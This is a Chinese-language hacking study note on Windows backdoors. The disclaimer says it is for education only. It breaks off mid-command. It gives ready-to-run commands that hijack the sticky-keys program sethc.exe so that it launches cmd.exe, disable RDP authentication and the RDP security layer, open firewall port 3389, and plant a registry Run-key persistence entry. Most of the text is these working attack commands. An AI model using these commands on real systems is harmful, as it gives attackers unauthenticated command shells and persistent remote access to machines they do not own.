郑重声明:
本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。
配合 Windows 提权文章
1 粘滞键后门
1.1 粘滞键
windows 系统下连续按 5 次 shift 可调出粘滞键功能,粘滞键是为了一次只能按一个键的人设计的,如按 ctrl+c/v 等组合的键时,就可以单按 5 下 shift 键来启动粘滞键功能,多个组合键就可以依次单个按下来实现,如复制,就可以先按一下 ctrl,然后再按一下 c 即可,这就是粘滞键功能。
1.1.1 设置粘滞键后门
通过注册表来实现,整体的方法思路就是通过修改注册表的映像劫持和打开其远程桌面来实现。
什么是映像劫持,简单理解就是当自己打开程序 a 的时候,实际上是打开的程序 b。这个功能是 windows 自带提供给一些开发调试软件用的,但常常也被恶意的病毒木马利用,比如我们要记录的当打开粘滞键 setch 的时候却打开了 cmd。
# 在注册表的 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ 位置添加被劫持的程序
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
# reg add 是向注册表添加记录,后面跟的是注册表的位置,这里需要注意的是 HKLM 实际上是 HKEY_LOCAL_MACHINE 的缩写。
# Image File Execution Option 用来设置镜像劫持命令中的 sethc 粘滞键程序
# /v 指定键名,这个键名 debugger 是固定的
# /t 来指定类型,即 REG_SZ 字符串类型
# /d 来指定键的值,即被恶意替换的程序,此处为 cmd程序。
# 把远程桌面链接的用户鉴定选项设置为关闭状态
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0
# 把远程桌面连接的安全层设置为 0
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0
1.2 配置开启远程桌面连接
# 配置防火墙允许远程桌面连接
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
# 设置注册表允许远程桌面连接
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
1.3 详细建议阅读此处文章
2 注册表后门
2.1 系统命令 reg
在普通用户权限下,将后门程序或脚本路径填写到注册表键 HKCU:Software\Microsoft\Windows\CurrentVersion\Run
中,当管理员登录系统时,后门就会运行。
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "calm" /t REG_SZ /d "C:\Users\user01\Desktop